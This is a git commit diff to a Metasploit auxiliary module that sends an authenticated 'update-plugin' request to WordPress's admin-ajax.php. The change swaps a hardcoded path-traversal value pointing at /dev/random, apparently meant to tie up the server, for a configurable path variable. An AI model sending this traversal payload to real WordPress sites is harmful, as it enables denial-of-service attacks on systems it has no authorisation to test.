Final version of configurable depth

bug/bundler_fix
root 2017-05-26 16:23:22 +02:00
parent 33ddef9303
commit 9b9d2f2345
1 changed files with 1 additions and 1 deletions

View File

@ -147,7 +147,7 @@ class MetasploitModule < Msf::Auxiliary
'uri' => normalize_uri(wordpress_url_backend, 'admin-ajax.php'),
'vars_post' => {
'action' => 'update-plugin',
'plugin' => '../../../../../../../../../../dev/random'
'plugin' => path
},
'cookie' => cookie
}, timeout = 0.2)